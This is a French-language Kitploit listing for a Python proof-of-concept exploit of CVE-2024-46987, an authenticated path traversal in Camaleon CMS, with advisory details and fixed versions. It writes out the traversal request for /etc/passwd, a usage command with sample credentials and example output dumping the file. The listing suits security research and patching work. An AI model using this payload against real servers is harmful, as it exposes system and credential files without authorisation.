Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-46987 — Exploit créé en Python | Kitploit
Outils/GitHubGitHub/advaitpathak21/cve-2024-46987
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubadvaitpathak21/cve-2024-46987

CVE-2024-46987

Exploit créé en Python

Voir le dépôt
1il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-46987 – Camaleon CMS : traversée de chemin authentifiée / lecture arbitraire de fichiers

CVSS 7.7 High Python PoC

CVE-2024-46987 est une vulnérabilité de traversée de chemin authentifiée (CWE-22) dans Camaleon CMS (un système de gestion de contenu basé sur Ruby on Rails). Elle permet à un utilisateur connecté (même avec des privilèges limités) de lire des fichiers arbitraires sur le serveur via l'action MediaController#download_private_file.

  • Publié : 18 septembre 2024
  • CVSS v3.1 : 7.7 High
    Vecteur : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  • CWE : CWE-22 (Limitation incorrecte du chemin d'un fichier à un répertoire restreint), CWE-200 (Exposition d'informations sensibles)
  • Versions concernées : Camaleon CMS ≤ 2.8.0 (certains rapports indiquent qu'elle fonctionne aussi sur 2.9.0)
  • Corrigée dans : ≥ 2.8.2 (recommandé : mettre à jour vers la dernière version 2.8.x ou 2.9.x)
  • Avis de sécurité :
    • GitHub Advisory GHSA-cp65-5m9r-vc2c
    • NVD CVE-2024-46987
    • GitHub Security Lab GHSL-2024-183

Aperçu de la vulnérabilité

Un attaquant disposant d'identifiants valides peut envoyer une requête spécialement conçue à : /admin/media/download_private_file?file=../../../../etc/passwd

Installation des dépendances

  • pip install -r requirements.txt

OU

  • pip install -r requests fire

Utilisation

  • Créez d'abord un nouvel utilisateur
root@kitploit:~
python cms-exploit.py \
  --url http://target.local \
  --username neal \
  --password 'Caffery@123' \
  --cmd /etc/passwd
  • Exemple de sortie :
root@kitploit:~
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.

Remarque : Le script suppose un formulaire de connexion de type Rails (user[email], user[password], authenticity_token). Ajustez les champs de la charge utile si votre cible utilise des noms personnalisés.

Avertissement légal et éthique

Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.

Utilisez-le uniquement sur des systèmes qui vous appartiennent ou pour lesquels vous disposez d'une autorisation écrite explicite de test (par exemple, les programmes de bug bounty, les tests d'intrusion internes, les laboratoires comme HTB). Toute utilisation non autorisée peut enfreindre les lois. L'auteur n'est pas responsable d'un mauvais usage.

Télécharger l’outil